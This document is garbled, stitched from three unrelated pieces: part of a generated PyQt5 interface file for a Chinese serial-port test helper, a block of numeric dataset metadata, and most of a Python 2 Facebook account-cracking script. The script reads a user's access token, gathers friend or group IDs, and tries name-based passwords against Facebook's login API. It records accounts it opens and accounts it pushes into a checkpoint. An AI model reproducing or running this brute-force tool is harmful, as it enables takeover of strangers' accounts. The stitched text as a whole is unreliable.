brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.printer_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei")
font.setPointSize(16)
self.printer_head_text.setFont(font)
self.printer_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.printer_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.printer_head_text.setReadOnly(True)
self.printer_head_text.setObjectName("printer_head_text")
self.verticalLayout_5.addWidget(self.printer_head_text)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.verticalLayout_7 = QtWidgets.QVBoxLayout()
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.printer_name = QtWidgets.QLineEdit(self.tab_setting)
self.printer_name.setEnabled(False)
self.printer_name.setCursor(QtGui.QCursor(QtCore.Qt.IBeamCursor))
self.printer_name.setAlignment(QtCore.Qt.AlignCenter)
self.printer_name.setReadOnly(True)
self.printer_name.setObjectName("printer_name")
self.verticalLayout_7.addWidget(self.printer_name)
self.btn_printer_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_printer_setting.setObjectName("btn_printer_setting")
self.verticalLayout_7.addWidget(self.btn_printer_setting)
self.horizontalLayout_4.addLayout(self.verticalLayout_7)
self.horizontalLayout_4.setStretch(0, 1)
self.verticalLayout_5.addLayout(self.horizontalLayout_4)
self.verticalLayout.addLayout(self.verticalLayout_5)
self.gridLayout_12.addLayout(self.verticalLayout, 0, 0, 1, 1)
self.horizontalLayout_11.addLayout(self.gridLayout_12)
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.label_4 = QtWidgets.QLabel(self.tab_setting)
self.label_4.setText("")
self.label_4.setObjectName("label_4")
self.horizontalLayout_14.addWidget(self.label_4)
self.horizontalLayout_11.addLayout(self.horizontalLayout_14)
self.horizontalLayout_11.setStretch(0, 3)
self.horizontalLayout_11.setStretch(1, 94)
self.horizontalLayout_11.setStretch(2, 3)
self.gridLayout_7.addLayout(self.horizontalLayout_11, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_setting, "")
self.tab_watching = QtWidgets.QWidget()
self.tab_watching.setObjectName("tab_watching")
self.gridLayout_8 = QtWidgets.QGridLayout(self.tab_watching)
self.gridLayout_8.setObjectName("gridLayout_8")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.label_2 = QtWidgets.QLabel(self.tab_watching)
self.label_2.setText("")
self.label_2.setObjectName("label_2")
self.horizontalLayout_10.addWidget(self.label_2)
self.horizontalLayout_2.addLayout(self.horizontalLayout_10)
self.verticalLayout_14 = QtWidgets.QVBoxLayout()
self.verticalLayout_14.setObjectName("verticalLayout_14")
self.plainText_display = QtWidgets.QPlainTextEdit(self.tab_watching)
font = QtGui.QFont()
font.setFamily("宋体")
font.setPointSize(12)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.plainText_display.setFont(font)
self.plainText_display.setUndoRedoEnabled(False)
self.plainText_display.setReadOnly(True)
self.plainText_display.setObjectName("plainText_display")
self.verticalLayout_14.addWidget(self.plainText_display)
self.textBrowser_result = QtWidgets.QTextBrowser(self.tab_watching)
self.textBrowser_result.setEnabled(True)
font = QtGui.QFont()
font.setFamily("微软雅黑")
self.textBrowser_result.setFont(font)
self.textBrowser_result.setObjectName("textBrowser_result")
self.verticalLayout_14.addWidget(self.textBrowser_result)
self.btn_reset_result = QtWidgets.QPushButton(self.tab_watching)
self.btn_reset_result.setObjectName("btn_reset_result")
self.verticalLayout_14.addWidget(self.btn_reset_result)
self.gridLayout_9 = QtWidgets.QGridLayout()
self.gridLayout_9.setObjectName("gridLayout_9")
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.gridLayout_9.addLayout(self.horizontalLayout_7, 0, 0, 1, 1)
self.btn_export_excle = QtWidgets.QPushButton(self.tab_watching)
self.btn_export_excle.setObjectName("btn_export_excle")
self.gridLayout_9.addWidget(self.btn_export_excle, 1, 5, 1, 1)
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.btn_save_log = QtWidgets.QPushButton(self.tab_watching)
self.btn_save_log.setObjectName("btn_save_log")
self.horizontalLayout_9.addWidget(self.btn_save_log)
self.checkBox_csm3510 = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_csm3510.setCheckable(True)
self.checkBox_csm3510.setChecked(True)
self.checkBox_csm3510.setObjectName("checkBox_csm3510")
self.horizontalLayout_9.addWidget(self.checkBox_csm3510)
self.checkBox_cc2640 = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_cc2640.setChecked(True)
self.checkBox_cc2640.setObjectName("checkBox_cc2640")
self.horizontalLayout_9.addWidget(self.checkBox_cc2640)
self.checkBox_currenter = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_currenter.setChecked(True)
self.checkBox_currenter.setObjectName("checkBox_currenter")
self.horizontalLayout_9.addWidget(self.checkBox_currenter)
self.checkBox_printer = QtWidgets.QCheckBox(self.tab_watching)
self.checkBox_printer.setChecked(True)
self.checkBox_printer.setObjectName("checkBox_printer")
self.horizontalLayout_9.addWidget(self.checkBox_printer)
self.gridLayout_9.addLayout(self.horizontalLayout_9, 1, 0, 1, 1)
self.gridLayout_9.setColumnStretch(0, 2)
self.verticalLayout_14.addLayout(self.gridLayout_9)
self.verticalLayout_14.setStretch(0, 12)
self.verticalLayout_14.setStretch(1, 5)
self.horizontalLayout_2.addLayout(self.verticalLayout_14)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.label = QtWidgets.QLabel(self.tab_watching)
self.label.setText("")
self.label.setObjectName("label")
self.horizontalLayout_8.addWidget(self.label)
self.horizontalLayout_2.addLayout(self.horizontalLayout_8)
self.horizontalLayout_2.setStretch(0, 5)
self.horizontalLayout_2.setStretch(1, 90)
self.horizontalLayout_2.setStretch(2, 5)
self.gridLayout_8.addLayout(self.horizontalLayout_2, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_watching, "")
self.tab_log = QtWidgets.QWidget()
self.tab_log.setObjectName("tab_log")
self.gridLayout_6 = QtWidgets.QGridLayout(self.tab_log)
self.gridLayout_6.setObjectName("gridLayout_6")
self.gridLayout_4 = QtWidgets.QGridLayout()
self.gridLayout_4.setContentsMargins(10, -1, 10, -1)
self.gridLayout_4.setObjectName("gridLayout_4")
self.plainTextEdit_log = QtWidgets.QPlainTextEdit(self.tab_log)
self.plainTextEdit_log.setObjectName("plainTextEdit_log")
self.gridLayout_4.addWidget(self.plainTextEdit_log, 0, 0, 1, 1)
self.gridLayout_6.addLayout(self.gridLayout_4, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_log, "")
self.tab_help = QtWidgets.QWidget()
self.tab_help.setObjectName("tab_help")
self.gridLayout_5 = QtWidgets.QGridLayout(self.tab_help)
self.gridLayout_5.setObjectName("gridLayout_5")
self.textBrowser_help = QtWidgets.QTextBrowser(self.tab_help)
self.textBrowser_help.setObjectName("textBrowser_help")
self.gridLayout_5.addWidget(self.textBrowser_help, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab_help, "")
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
self.horizontalLayout.addLayout(self.gridLayout)
MainWindow.setCentralWidget(self.centralwidget)
self.actionVersion = QtWidgets.QAction(MainWindow)
self.actionVersion.setObjectName("actionVersion")
self.actionAbout = QtWidgets.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.actionClose = QtWidgets.QAction(MainWindow)
self.actionClose.setObjectName("actionClose")
self.actionautoDetect = QtWidgets.QAction(MainWindow)
self.actionautoDetect.setCheckable(False)
self.actionautoDetect.setObjectName("actionautoDetect")
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "CSM3510_Helper"))
self.csm3510_head_text.setText(_translate("MainWindow", "配置CSM3510串口"))
self.lineEdit_16.setText(_translate("MainWindow", "端 口"))
self.lineEdit_17.setText(_translate("MainWindow", "波 特 率"))
self.lineEdit_18.setText(_translate("MainWindow", "数 据 位"))
self.btn_csm3510_setting.setText(_translate("MainWindow", "设 置"))
self.btn_csm3510_autodetect.setText(_translate("MainWindow", "自动识别"))
self.cc2640_head_text.setText(_translate("MainWindow", "配置测试架串口"))
self.lineEdit_6.setText(_translate("MainWindow", "端 口"))
self.lineEdit_7.setText(_translate("MainWindow", "波 特 率"))
self.lineEdit_8.setText(_translate("MainWindow", "数 据 位"))
self.btn_cc2640_setting.setText(_translate("MainWindow", "设 置"))
self.btn_cc2640_autodetect.setText(_translate("MainWindow", "自动识别"))
self.currenter_head_text.setText(_translate("MainWindow", "配置电流表串口"))
self.lineEdit_21.setText(_translate("MainWindow", "端 口"))
self.lineEdit_22.setText(_translate("MainWindow", "波 特 率"))
self.lineEdit_27.setText(_translate("MainWindow", "数 据 位"))
self.btn_currenter_setting.setText(_translate("MainWindow", "设 置"))
self.btn_currenter_autodetect.setText(_translate("MainWindow", "自动识别"))
self.printer_head_text.setText(_translate("MainWindow", "配置打印机属性"))
self.btn_printer_setting.setText(_translate("MainWindow", "设置属性/打印测试页"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_setting), _translate("MainWindow", "设置"))
self.plainText_display.setPlainText(_translate("MainWindow", "等待中......"))
self.btn_reset_result.setText(_translate("MainWindow", "复测"))
self.btn_export_excle.setText(_translate("MainWindow", "导出excle"))
self.btn_save_log.setText(_translate("MainWindow", "存档"))
self.checkBox_csm3510.setText(_translate("MainWindow", "CSM3510"))
self.checkBox_cc2640.setText(_translate("MainWindow", "测试架"))
self.checkBox_currenter.setText(_translate("MainWindow", "电流表"))
self.checkBox_printer.setText(_translate("MainWindow", "打印机"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_watching), _translate("MainWindow", "监测"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_log), _translate("MainWindow", "日志"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_help), _translate("MainWindow", "帮助"))
self.actionVersion.setText(_translate("MainWindow", "版本号"))
self.actionAbout.setText(_translate("MainWindow", "关于"))
self.actionAbout.setIconText(_translate("MainWindow", "关于"))
self.actionClose.setText(_translate("MainWindow", "关闭"))
self.actionautoDetect.setText(_translate("MainWindow", "自动配置串口"))
| 60.502248
| 108
| 0.707947
| 10,928
| 94,202
| 6.03459
| 0.02489
| 0.143511
| 0.087344
| 0.114639
| 0.829694
| 0.805326
| 0.775756
| 0.743108
| 0.71319
| 0.70861
| 0
| 0.046312
| 0.174816
| 94,202
| 1,556
| 109
| 60.541131
| 0.802043
| 0.001932
| 0
| 0.716969
| 1
| 0
| 0.021753
| 0.003021
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001295
| false
| 0
| 0.000648
| 0
| 0.002591
| 0.016839
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
be2e1ac0eb53b715b8e3492d93ac7421a1c61da3
| 164
|
py
|
Python
|
SimPEG/electromagnetics/natural_source/utils/plotDataTypes.py
|
prisae/simpeg
|
5cdd1b496bddcf3d9acd714b901a57bad6fb1ef9
|
[
"MIT"
] | 3
|
2021-08-04T02:27:41.000Z
|
2022-01-12T00:20:07.000Z
|
SimPEG/electromagnetics/natural_source/utils/plotDataTypes.py
|
thast/simpeg
|
8021082b8b53f3c08fa87fc085547bdd56437c6b
|
[
"MIT"
] | 2
|
2020-06-16T00:11:37.000Z
|
2020-07-10T19:45:09.000Z
|
SimPEG/electromagnetics/natural_source/utils/plotDataTypes.py
|
thast/simpeg
|
8021082b8b53f3c08fa87fc085547bdd56437c6b
|
[
"MIT"
] | 1
|
2021-12-29T00:06:07.000Z
|
2021-12-29T00:06:07.000Z
|
from ....utils.code_utils import deprecate_module
deprecate_module("plotDataTypes", "plot_data_types", "0.16.0", future_warn=True)
from .plot_data_types import *
| 27.333333
| 80
| 0.786585
| 24
| 164
| 5.041667
| 0.625
| 0.247934
| 0.214876
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.085366
| 164
| 5
| 81
| 32.8
| 0.78
| 0
| 0
| 0
| 0
| 0
| 0.207317
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be95fe69d3da94304f9bbf30e3c65814a11f0c72
| 28,745
|
py
|
Python
|
2020.py
|
farelind/relind_2020
|
7b50f5bffcbc70d7e62e60aa2a15f65a93a00592
|
[
"Apache-2.0"
] | null | null | null |
2020.py
|
farelind/relind_2020
|
7b50f5bffcbc70d7e62e60aa2a15f65a93a00592
|
[
"Apache-2.0"
] | null | null | null |
2020.py
|
farelind/relind_2020
|
7b50f5bffcbc70d7e62e60aa2a15f65a93a00592
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
# coding=utf-8
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
from datetime import datetime
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
try:
import requests
except ImportError:
os.system("pip2 install requests")
os.system("python2 2020.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "[!] Exit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'%s;'%str(31+j))
x += ''
x = x.replace('!0','')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
#########LOGO#########
logo = """
\033[1;97m ╔══════════════♧═♡■♡═♧════════════════╗
\033[1;97m Farel_Ind Gans
MedanCyberTeam\033[1;97m.
\033[1;97m Team : Ind Guard Neverdie.
\033[1;97m ╚════════════════♡═♡══════════════════╝
\033[1;97m ╔═════════════════════════════════════╗
\033[1;97m ║ Author : Farel_Ind
\033[1;97m ║ Github : https://github.com/farelind.
\033[1;97m ╚═════════════════════════════════════╝ """
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m●\033[1;97m]\033[1;93m Sedang Masuk\033[1;97m "+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
######MASUK######
def masuk():
os.system('clear')
print logo
print "\033[1;97m ╔ ╗"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;96m\033[1;97m Login Menggunakan Token Facebook"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;96m\033[1;97m Keluar"
print "\033[1;97m ╚ ╝"
pilih_masuk()
def pilih_masuk():
msuk = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if msuk =="":
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
elif msuk =="1" or msuk =="01":
tokenz()
elif msuk =="0" or msuk =="00":
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
#####LOGIN_TOKENZ#####
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m \033[1;97mToken FB? : \033[1;93m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
jalan ('\033[1;97m Jangan Lupa Follow Akun Pribadi Saya :)')
jalan ('\033[1;97m[\033[1;91m•\033[1;97m•\033[1;97m]\033[1;92m Login Berhasil')
os.system('xdg-open https://m.facebook.com/xxx.hilmanxd')
menu()
except KeyError:
print "\033[1;97m[\033[1;93m!\033[1;97m] \033[1;93mToken Salah !"
time.sleep(1.0)
masuk()
######MENU#######
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' +toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi"
keluar()
os.system("clear")
print logo
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m Nama Akun Facebook Anda:\033[1;97m·\033[1;97m "+nama
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m User ID Akun Anda:\033[1;97m·\033[1;97m "+id
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m Tanggal Lahir Facebook Anda:\033[1;97m·\033[1;97m "+ a['birthday']
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;97m\033[1;97m Crack ID Indonesia"
print "\033[1;97m [\033[1;97m02\033[1;97m]\033[1;97m\033[1;97m Crack ID Group"
print "\033[1;97m [\033[1;97m03\033[1;97m]\033[1;97m\033[1;97m Ambil ID"
print "\033[1;97m [\033[1;97m04\033[1;97m]\033[1;97m\033[1;97m Ikuti Saya di Facebook"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;97m\033[1;97m Logout"
print "\033[1;97m ══════════════════════════════════════════"
pilih()
######PILIH######
def pilih():
unikers = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if unikers =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
elif unikers =="1" or unikers =="01":
indo()
elif unikers =="2" or unikers =="02":
crack_likes()
elif unikers =="3" or unikers =="03":
dump()
elif unikers =="4" or unikers =="04":
saya()
elif unikers =="0" or unikers =="00":
os.system('clear')
jalan('Menghapus Token')
os.system('rm -rf login.txt')
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
########## CRACK INDONESIA #######
def indo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;97m\033[1;97m Crack dari ID Publik / Teman"
print "\033[1;97m [\033[1;97m02\033[1;97m]\033[1;97m\033[1;97m Crack dari File"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;97m\033[1;97m Kembali"
print "\033[1;97m ══════════════════════════════════════════"
pilih_indo()
#### PILIH INDO ####
def pilih_indo():
teak = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if teak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
idt = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] User ID Target : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Nama Akun : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;93m!\033[1;97m] ID Publik / Teman Tidak Ada !"
raw_input("\n[ Kembali ]")
indo()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
try:
print "\033[1;97m ══════════════════════════════════════════"
idlist = raw_input('\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Nama File Target : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m[\033[1;93m!\033[1;97m] File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m[!] File tidak ada !'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
indo()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Total ID : "+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m \033[1;41;97m TO STOP PROCESS,PRESS CTRL+Z.GOOD LUCK :) \033[0m"
print "\033[1;97m ══════════════════════════════════════════"
##### MAIN INDONESIA #####
def main(arg):
sys.stdout.write('\r{}'.format(datetime.now().strftime('\033[1;97m%H:%M:%S')));sys.stdout.flush()
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
c = json.loads(a.text)
pass1 = c['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass1 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass1 + ' • ' + c['name']
cekpoint.append(user)
else:
pass2 = c['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass2 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass2 + ' • ' + c['name']
cekpoint.append(user)
else:
pass3 = c['first_name']+'102030'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass3 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass3 + ' • ' + c['name']
cekpoint.append(user)
else:
pass4 = c['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass4 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass4 + ' • ' + c['name']
cekpoint.append(user)
else:
pass5 = c['last_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass5 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass5 + ' • ' + c['name']
cekpoint.append(user)
else:
pass6 = 'Anjing'
